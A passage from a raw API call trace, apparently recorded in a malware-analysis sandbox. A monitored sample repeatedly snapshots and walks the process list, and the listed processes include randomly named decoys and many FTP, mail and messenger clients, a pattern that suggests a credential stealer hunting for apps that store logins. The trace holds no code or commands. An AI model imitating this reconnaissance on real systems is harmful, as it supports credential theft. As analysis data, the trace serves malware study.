dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0273.228] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0273.230] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0273.232] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0273.234] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.235] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0273.237] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0273.238] CloseHandle (hObject=0x758) returned 1 [0273.239] Sleep (dwMilliseconds=0x64) [0273.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0273.354] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.358] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.360] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.362] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.363] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.365] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.366] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.368] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.369] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.371] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.375] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.378] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.379] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.381] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.382] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.384] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.385] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.431] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.499] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.500] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.502] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0273.504] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0273.506] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.508] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.510] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0273.512] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0273.517] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0273.519] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.520] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0273.522] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0273.524] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0273.525] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0273.527] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0273.531] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0273.533] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0273.564] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0273.567] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0273.569] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0273.570] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0273.572] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0273.573] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0273.578] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0273.579] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0273.581] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0273.583] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0273.585] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0273.587] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0273.589] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0273.597] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0273.599] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0273.601] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0273.603] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0273.604] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0273.659] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0273.661] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0273.663] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0273.664] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0273.666] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0273.667] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0273.676] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0273.678] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0273.680] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0273.682] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0273.684] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0273.688] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0273.690] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0273.691] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0273.693] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0273.695] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0273.697] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0273.705] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0273.707] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0273.771] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0273.773] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0273.774] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0273.776] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0273.778] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0273.782] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: 